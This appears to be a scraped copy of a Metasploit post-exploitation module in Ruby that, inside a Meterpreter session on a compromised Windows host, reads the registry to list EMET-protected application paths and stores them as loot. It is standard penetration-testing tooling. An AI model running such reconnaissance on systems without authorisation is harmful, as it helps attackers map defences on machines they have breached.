Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8
  include Msf::Post::Common
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Windows Gather EMET Protected Paths',
15
        'Description' => %q{ This module will enumerate the EMET protected paths on the target host.},
16
        'License' => MSF_LICENSE,
17
        'Author' => [ 'vysec <vincent.yiu[at]mwrinfosecurity.com>' ],
18
        'Platform' => [ 'win' ],
19
        'SessionTypes' => [ 'meterpreter' ]
20
      )
21
    )
22
  end
23

24
  def print_status(msg = '')
25
    super("#{peer} - #{msg}")
26
  end
27

28
  def print_good(msg = '')
29
    super("#{peer} - #{msg}")
30
  end
31

32
  def run
33
    reg_view = sysinfo['Architecture'] == ARCH_X64 ? REGISTRY_VIEW_64_BIT : REGISTRY_VIEW_32_BIT
34
    reg_vals = registry_enumvals('HKLM\\SOFTWARE\\Microsoft\\EMET\\AppSettings', reg_view)
35
    if reg_vals.nil?
36
      print_error('Failed to enumerate EMET Protected.')
37
    else
38
      print_status('Found protected processes:')
39
      reg_vals.each do |path|
40
        print_status(path)
41
      end
42
      path = store_loot('host.emet_paths', 'text/plain', session, reg_vals.join("\r\n"), 'emet_paths.txt', 'EMET Paths')
43
      print_good("Results stored in: #{path}")
44
    end
45
  end
46
end
47

48